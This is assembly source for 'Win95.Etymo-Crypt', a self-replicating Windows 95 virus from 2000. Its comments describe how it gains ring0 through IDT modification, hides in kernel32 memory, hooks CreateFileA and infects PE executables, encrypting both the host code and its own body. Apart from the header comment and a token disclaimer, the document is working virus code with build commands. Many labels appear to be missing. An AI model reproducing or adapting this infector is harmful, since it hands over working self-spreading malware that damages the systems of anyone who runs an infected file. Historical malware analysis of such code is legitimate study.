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; *************************************************************************
; ******************** ********************
; ******************** Win95.Etymo-Crypt ********************
; ******************** by ********************
; ******************** BLACK JACK ********************
; ******************** ********************
; *************************************************************************
comment ~
NAME: Win95.Etymo-Crypt
AUTHOR: Black Jack [independant Austrian Win32asm virus coder]
CONTACT: Black_Jack_VX@hotmail.com | http://www.coderz.net/blackjack
TYPE: Win9x global ring3 resident parasitic PE infector
SIZE: 1308 bytes
DESCRIPTION: When an infected file is run, the virus gets control. It gains
ring0 by the standart IDT modifying trick. But it doesn't stay
resident in ring0 (hooking VxD calls), but it just uses its
ring0 privilege to write to the write-protected kernel32 memory:
it copies itself into a gap in kernel32 in memory (between
the header and the start of the first section, like nigr0's
Win95.K32 virus) and hooks the CreateFileA API.
Whenever the virus intercepts a file open now, it checks if
the opened file is an infectable, uninfected PE EXE and infects
it if all is ok. The infection process is a bit unusual: The
virus creates a new section called ".vdata" (with standart data
section attributes) and saves there the code from the entrypoint,
after it has been encrypted against the virusbody. Then the
entrypoint is overwritten with virus code, most of it encrypted
again. The attributes of the code section are not modified, the
virus doesn't need the write attribute set, because it only
modifies its data when it is in ring0. The pro of this infection
method is that there are no sections with unusual attributes.
KNOWN BUGS: Since the virus needs to be resident to restore control to the
host, there is no need for checking the OS or preventing errors
with SEH, because infected files will crash under WinNT anyways,
there's no way to prevent that.
Because of that unbound import stuff, the virus only catches
very few file opens. In a kernel32.dll infector this would be
easy to prevent by changing the timedate stamp of kernel32.dll.
In this case this doesn't work, because the system checks this
stamp after the kernel32 has been loaded into memory and will
give error messages if it has been changed each times the user
tries to start a program. Another possible solution, patching
the entry point of the hooked API with the JMP_virus instruction,
like nigr0 and Bumblebee do, won't work too, because with my
residency method the kernel memory stays write protected. And so
this virus is a slow infector, but it still catches enough file
opens to replicate successfully.
tasm32 /mx /m etymo.asm
tlink32 /Tpe /aa etymo.obj,,, import32.lib
there's no need for PEWRSEC or a similar tool, because the
virus code is supposed to run in a read-only section anyways.
DISCLAIMER: I do *NOT* support the spreading of viruses in the wild.
Therefore, this source was only written for research and
education. Please do not spread it. The author can't be hold
responsible for what you decide to do with this source.
PS: Greetings go to Gilgalad for the name of this virus!
; ===========================================================================
virussize EQU (virus_end - virus_start)
workspace EQU 10000
Extrn MessageBoxA:Proc ; only for 1st gen
Extrn ExitProcess:Proc
model flat
; First generation code is in the data section:
push 0 ; show stupid messagebox
push offset caption
push offset message
push 0
call MessageBoxA
JMP virus_start
; quit program
push 0 ; exit code
push 0 ; ret address of call
push offset ExitProcess ; can't do a real call,
RET ; because this code is moved
caption db "Black Jack strikes again...", 0
message db "Press OK to run the Win95.Etymo-Crypt virus", 0
mov esi, offset new_bytes ; skip the decryption in the
mov edi, offset jmp_skip_decryption_1st_gen ; first generation
JMP over_encryption
mov ecx, ((virus_end - encrypted)/4)
; Virus body is in the code section:
; We have to access the section with the original host code from ring3 first,
; because if we access it first from ring0, it is not mapped yet and the
; virus will cause an exception. besides, the first dword of the encrypted
; host code is also the key for the virus decryption.
db 0A1h ; mov eax, [imm32]
org_host_code_VA dd offset quit_1st_gen
call next ; go to ring0 calling routine
; ----- FIRST PART OF RING0 CODE --------------------------------------------
pop ebp ; offset of end_next label
sub ebp, (end_next - virus_start) ; EBP=delta offset
push ebp ; is also true offset of
; virus start in memory,
; where we will return to
mov dword ptr [edx+5*8], esi ; restore interrupt
mov dword ptr [edx+5*8+4], edi ; descriptor
lea edi, [ebp+virus_end-virus_start] ; EDI=end of virus in memory
JMP skip_decryption_1st_gen ; skip decryption in first
; generation. will be
; replaced with:
; mov ecx, ((virus_end - encrypted)/4)
dec edi ; go to previous dword
dec edi
dec edi
dec edi
xor dword ptr [edi], eax ; decrypt one dword
mov eax, dword ptr [edi] ; decrypted dword is new key
LOOP decrypt_virus_body ; loop until all is decrypted
JMP encrypted ; jump to code that was just
; decrypted.
; ----- JUMP TO RING0 -------------------------------------------------------
push edx ; reserve room on stack
sidt [esp-2] ; get IDT address
pop edx ; EDX=IDT address
mov esi, dword ptr [edx+5*8] ; save old interrupt
mov edi, dword ptr [edx+5*8+4] ; descriptor to EDI:ESI
pop ebx ; get address of ring0 proc
mov word ptr [edx+5*8], bx ; write offset of our ring0
shr ebx, 16 ; procedure into interrupt
mov word ptr [edx+5*8+6], bx ; descriptor
int 5 ; call our ring0 code!
; no IRET to here.
; ----- MAIN ENCRYPTED RING0 CODE -------------------------------------------
; now we decrypt the original start code of the host, which has been
; encrypted against the virus body.
mov esi, ebp ; ESI=start of virus body
mov edi, [ebp + (org_host_code_VA-virus_start)] ; start of host code
xor ecx, ecx ; ECX=0
sub byte ptr [edi+ecx], al
inc ecx
xor byte ptr [edi+ecx], al
inc ecx
add byte ptr [edi+ecx], al
inc ecx
xor byte ptr [edi+ecx], al
inc ecx
cmp ecx, virussize ; all decrypted?
JB decrypt_loop ; loop until all is done
; the kernel32 address is hardcoded, because this is virus is only Win95
; compatible anyways
mov eax, 0BFF70000h ; EAX=kernel32 offset
mov ebx, eax ; EBX=EAX
add ebx, [eax+3Ch] ; EBX=PE header VA
mov edi, [ebx+54h] ; header size
add edi, eax ; EDI=virus VA
cmp byte ptr [edi], 0A1h ; "mov eax, imm32" opcode is
JE already_resident ; residency marker
push edi ; save virus VA in kernel32
; ----- SEARCH API ADDRESSES ------------------------------------------------
mov edx, [ebx+78h] ; EDX=export directory RVA
add edx, eax ; EDX=export directory VA
lea esi, [ebp + (names_RVA_table - virus_start)] ; array with ptrs
; to API names
lea edi, [ebp + (API_RVAs - virus_start)] ; where to store the
; API adresses
xor ecx, ecx ; ECX=0 (API names counter)
pusha ; save all registers
push eax ; save EAX (kernel32 offset)
lodsd ; get offset of API name
or eax, eax ; all done?
JZ all_found
add eax, ebp ; fixup with delta offset
xchg eax, esi ; ESI=VA of a needed API name
pop eax ; restore EAX (kernel32 offs)
mov edi, [edx+20h] ; EDI=AddressOfNames RVA
add edi, eax ; EDI=AddressOfNames VA
mov edi, [edi+ecx*4] ; EDI=RVA of API Name
add edi, eax ; EDI=VA of API Name
lodsb ; get char from our API name
scasb ; equal to the one in k32 ?
JNE search_on_API ; if not,try next exported API
or al, al ; end of name?
JZ found_API ; we've found an needed API!
JMP cmp_loop ; go on with name compare
popa ; restore all registers
inc ecx ; try next API in exports
JMP search_loop ; go on
popa ; restore all registers
shl ecx, 1 ; ECX=ECX*2 (index ordinals)
add ecx, [edx+24h] ; AddressOfOrdinals RVA
movzx ecx, word ptr [ecx+eax] ; ECX=API Ordinal
shl ecx, 2 ; ECX=ECX*4
add ecx, [edx+1Ch] ; AddressOfFunctions RVA
add ecx, eax ; ECX=VA of API RVA
mov dword ptr [ebp+(hook_API-virus_start)], ecx ; save it
mov ecx, [ecx] ; ECX=API RVA
push eax ; save EAX (kernel32 base)
add eax, ecx ; EAX=API VA!
stosd ; store it!
lodsd ; do the next API (add esi,4)
pop eax ; restore EAX (kernel32 base)
JMP find_API ; do next API.
pop eax ; remove EAX from stack
popa ; restore all registers
; last found API is hooked
mov ecx, [ebp+(hook_API-virus_start)] ; ECX=VA of API RVA
mov edx, [ebx+54h] ; kernel32 header size
; (virus RVA in kernel32)
add edx, (hook - virus_start) ; RVA virus hook in kernel32
mov [ecx], edx ; hook API!
pop edi ; restore EDI:virus VA in k32
mov esi, ebp ; ESI=start of virus in mem
mov ecx, virussize ; ECX=virussize
cld ; clear directory flag
rep movsb ; move virus to TSR location!
sub edi, (virus_end - go_on_r0) ; EDI=offset go_on_r0 in k32
JMP restore_host ; restore host
add edi, (go_on_r0 - virus_start) ; EDI=offset go_on_r0 in k32
mov esi, [ebp + (org_host_code_VA - virus_start)] ; ESI=offset
; of original host code
JMP edi ; go to go_on_r0 in kernel32
mov edi, ebp ; EDI=virus/host entrypoint
mov ecx, virussize ; ECX=virussize
cld ; clear directory flag
rep movsb ; move host code back!
iretd ; go to original entry point
; in ring3!
; ----- TSR VIRUS HOOK OF CreateFileA ---------------------------------------
push eax ; reserve room on stack for
; return address
pushf ; save flags
pusha ; save all registers
call TSR_next ; get delta offset
pop ebp
sub ebp, offset TSR_next
mov eax, [ebp+offset CreateFileA] ; address of original routine
mov [esp+9*4], eax ; set return address
mov esi, [esp+11*4] ; get address of filename
push esi ; save it
lodsb ; get a byte from filename
or al, al ; end of filename?
JNZ search_ext ; search on
mov eax, [esi-4] ; get extension in AX
pop esi ; restore filename ptr in ESI
or eax, 00202020h ; make lowercase
cmp eax, "exe" ; is it an EXE file?
JNE exit_hook ; if not, then exit
push esi ; offset filename
call [ebp+offset GetFileAttributesA] ; get file attribtes
inc eax ; -1 means error
JZ exit_hook
dec eax
push eax ; save attributes and
push esi ; filename ptr so we can
; restore the attribs later
push 80h ; normal attributes
push esi
call [ebp+offset SetFileAttributesA] ; reset file attributes
or eax, eax ; 0 means error
JZ reset_attributes
push 0 ; template file (shit)
push 80h ; file attributes (normal)
push 3 ; open existing
push 0 ; security attributes (shit)
push 0 ; do not share file
push 0C0000000h ; read/write mode
push esi ; pointer to filename
call [ebp+offset CreateFileA] ; OPEN FILE.
inc eax ; EAX= -1 (Invalid handle)
JZ reset_attributes
dec eax
push eax ; save filehandle
xchg edi, eax ; EDI=filehandle
sub esp, 3*8 ; reserve space on stack
; to store the filetimes
mov ebx, esp ; get the filetimes to the
push ebx ; reserved place on stack
add ebx, 8
push ebx
add ebx, 8
push ebx
push edi ; filehandle
call [ebp+offset GetFileTime] ; get the filetimes
or eax, eax ; error?
JZ closefile
push 0 ; high file_size dword ptr
push edi
call [ebp+offset GetFileSize] ; get the filesize to EAX
inc eax ; -1 means error
JZ closefile
dec eax
mov ebx, esp ; save addresses of filetimes
push ebx ; for the API call to restore
add ebx, 8 ; them later
push ebx
add ebx, 8
push ebx
push edi
push edi ; filehandle for SetEndofFile
; for the SetFilePointer at
; the end to truncate file
push 0 ; move relative to filestart
push 0 ; high word of file pointer
push eax ; filesize
push edi ; filehandle
add eax, workspace
push 0 ; name file mapping obj (shit)
push eax ; low dword of file_size
push 0 ; high dword of file_size
push 0 ; security attributes (shit)
push edi
call [ebp+offset CreateFileMappingA]
or eax, eax ; error happened?
JZ error_createfilemapping
push eax ; save maphandle for
; CloseHandle
push 0 ; map the whole file
push 0 ; low dword of fileoffset
push 0 ; high dword of fileoffset
push 2 ; read/write access
push eax ; maphandle
call [ebp+offset MapViewOfFile]
or eax, eax
JZ closemaphandle
push eax ; save mapbase for
; UnmapViewOfFile
cmp word ptr [eax], "ZM" ; exe file?
JNE closemap ; if not, then exit
cmp word ptr [eax+18h], 40h ; new executable header?
JNE closemap ; if not, then exit
add eax, [eax+3Ch] ; EBX=new header address
cmp dword ptr [eax], "EP" ; PE file?
JNE closemap ; if not, then exit
test word ptr [eax+16h], 0010000000000000b ; DLL ?
JNZ closemap ; if yes, then exit
movzx ecx, word ptr [eax+14h] ; SizeOfOptionalHeader
mov ebx, eax ; EBX=offset PE header
add ebx, 18h ; SizeOfNTHeader
add ebx, ecx ; EBX=first section header
push ebx ; save it
mov ecx, [eax+28h] ; ECX=EntryRVA
sub ecx, [ebx+0Ch] ; Virtualaddress of section
sub ecx, [ebx+10h] ; SizeOfRawData
JB found_code_section ; we found the code section!
add ebx, 40 ; next section
JMP find_code_section ; search on
mov edx, [eax+28h] ; EDX=EntryRVA
sub edx, [ebx+0Ch] ; Virtualaddress
add edx, [ebx+14h] ; AddressOfRawData
; EDX=RAW ptr to entrypoint
pop ebx ; EBX=first section header
cmp ecx, -virussize ; enough room left in the
JG closemap ; section for the virus body?
mov ecx, [esp] ; ECX=mapbase
add ecx, edx ; ECX=entrypoint in Filemap
cmp byte ptr [ecx], 0A1h ; already infected ?
JE closemap ; if so, then exit
push edx ; save RAW entrypoint address
movzx edx, word ptr [eax+6] ; NumberOfSections
dec edx
imul edx, edx, 40
add ebx, edx ; EBX=last section header
inc word ptr [eax+6] ; increase NumberOfSections
mov dword ptr [ebx+40+00h], "adv." ; name ".vdata"
mov dword ptr [ebx+40+04h], "at"
mov dword ptr [ebx+40+08h], virussize ; Virtualsize
mov edx, [ebx+0Ch] ; VirtualAddress
add edx, [ebx+08h] ; VirtualSize
mov ecx, [eax+38h] ; SectionAlign
call align_EDX
mov dword ptr [ebx+40+0Ch], edx ; VirtualAddress
add edx, virussize ; new ImageSize
call align_EDX ; align to SectionAlign
mov dword ptr [eax+50h], edx ; store new ImageSize
mov edx, virussize
mov ecx, [eax+3Ch] ; FileAlign
call align_EDX ; align virsize to FileAlign
mov dword ptr [ebx+40+10h], edx ; store new SizeOfRawData
mov edx, [ebx+14h] ; PointerToRawData
add edx, [ebx+10h] ; SizeOfRawData
call align_EDX ; align new section
; raw offset to FileAlign
mov dword ptr [ebx+40+14h], edx ; store new PointerToRawData
add edx, [ebx+40+10h] ; SizeOfRawData
mov dword ptr [esp+4*4], edx ; new filesize
mov dword ptr [ebx+40+18h], 0 ; Relocation shit
mov dword ptr [ebx+40+1Ch], 0
mov dword ptr [ebx+40+20h], 0
mov dword ptr [ebx+40+24h], 0C0000040h ; flags: [IWR], this is the
; standart for data sections
mov edx, dword ptr [ebx+40+0Ch] ; RVA host code
add edx, [eax+34h] ; add ImageBase to get VA
pop esi ; ESI=RAW entrypoint address
pop eax ; EAX=mapbase
push eax ; we still need it on stack
add esi, eax ; ESI=entrypoint in FileMap
push esi ; save it on stack
mov edi, dword ptr [ebx+40+14h] ; PointerToRawData
add edi, eax ; start of new section in map
mov ecx, virussize ; bytes to move
push ecx ; save virussize on stack
mov eax, edi ; EAX=new section in FileMap
rep movsb ; of entry point code to
; newly created section
pop ecx ; ECX=virussize
pop edi ; EDI=entrypoint in Filemap
lea esi, [ebp + offset virus_start] ; ESI=virusstart in memory
rep movsb ; move virus body to
; original Entrypoint of File
mov [edi - (virus_end-org_host_code_VA)], edx ; store RVA of
; original host start code
push edi ; Save end of virus body
; in Filemap
mov esi, edi ; ESI=virus end in Filemap
sub esi, virussize ; ESI=virus start in Filemap
xchg edi, eax ; EDI=start of new section
; Encrypt the code from the original entry point against the virus body.
add byte ptr [edi+ecx], al
inc ecx
xor byte ptr [edi+ecx], al
inc ecx
sub byte ptr [edi+ecx], al
inc ecx
xor byte ptr [edi+ecx], al
inc ecx
cmp ecx, virussize ; all encrypted?
JB encrypt_loop ; if not, then crypt on
; and now the main part of the virus body is encrypted itself. It is crypted
; from the end of the virus body upwards, for each dword is the next dword
; used as crypt key. The first key is the first dword of the encrypted
; host code.
mov ecx, ((virus_end - encrypted)/4) ; size to crypt in dwords
mov eax, dword ptr [edi] ; initial key
pop edi ; end of virus in filemap
dec edi ; go to previous dword
dec edi
dec edi
dec edi
mov ebx, dword ptr [edi] ; this dword is the next key
xor dword ptr [edi], eax ; encrypt it with this key
xchg ebx, eax ; change keys
LOOP encrypt_virus_body ; LOOP until encryption done
; the parameters for the following API calls have already been pushed on the
; stack while the opening process of the file
call [ebp+offset UnmapViewOfFile] ; unmap file
call [ebp+offset CloseHandle] ; close map handle
call [ebp+offset SetFilePointer] ; set file pointer to EOF
call [ebp+offset SetEndOfFile] ; truncate file here
call [ebp+offset SetFileTime] ; restore filetimes
add esp, 8*3 ; remove filetimes from stack
call [ebp+offset CloseHandle] ; close file
call [ebp+offset SetFileAttributesA] ; reset attributes
popa ; restore all registers
popf ; restore flags
ret ; go to original API routine
; ----- ALIGN SUBROUTINE ----------------------------------------------------
; aligns EDX to ECX
push eax ; save EAX
push edx ; save EDX
xchg eax, edx ; EAX=value to align
xor edx, edx ; EDX=0
div ecx ; divide EDX:EAX by ECX
pop eax ; restore old EDX in EAX
or edx, edx ; EDX=mod of division
JZ already_aligned ; already aligned?
add eax, ecx ; if not align
sub eax, edx ; EDX=mod
xchg eax, edx ; EDX=aligned value
pop eax ; restore EAX
db "[Win95.Etymo-Crypt] by Black Jack", 0
db "This virus was written in Austria in May/June/July 2000", 0
dd (n_GetFileAttributesA - virus_start)
dd (n_SetFileAttributesA - virus_start)
dd (n_GetFileTime - virus_start)
dd (n_GetFileSize - virus_start)
dd (n_CreateFileMappingA - virus_start)
dd (n_MapViewOfFile - virus_start)
dd (n_UnmapViewOfFile - virus_start)
dd (n_SetFilePointer - virus_start)
dd (n_SetEndOfFile - virus_start)
dd (n_CloseHandle - virus_start)
dd (n_SetFileTime - virus_start)
dd (n_CreateFileA - virus_start)
dd 0
n_GetFileAttributesA db "GetFileAttributesA", 0
n_SetFileAttributesA db "SetFileAttributesA", 0
n_GetFileTime db "GetFileTime", 0
n_GetFileSize db "GetFileSize", 0
n_CreateFileMappingA db "CreateFileMappingA", 0
n_MapViewOfFile db "MapViewOfFile", 0
n_UnmapViewOfFile db "UnmapViewOfFile", 0
n_SetFilePointer db "SetFilePointer", 0
n_SetEndOfFile db "SetEndOfFile", 0
n_CloseHandle db "CloseHandle", 0
n_SetFileTime db "SetFileTime", 0
n_CreateFileA db "CreateFileA", 0
GetFileAttributesA dd ?
SetFileAttributesA dd ?
GetFileTime dd ?
GetFileSize dd ?
CreateFileMappingA dd ?
MapViewOfFile dd ?
UnmapViewOfFile dd ?
SetFilePointer dd ?
SetEndOfFile dd ?
CloseHandle dd ?
SetFileTime dd ?
CreateFileA dd ?
hook_API dd ?
if ((($-virus_start) mod 4) NE 0) ; align virussize to dwords
db (4-(($-virus_start) mod 4)) dup(0)
end start |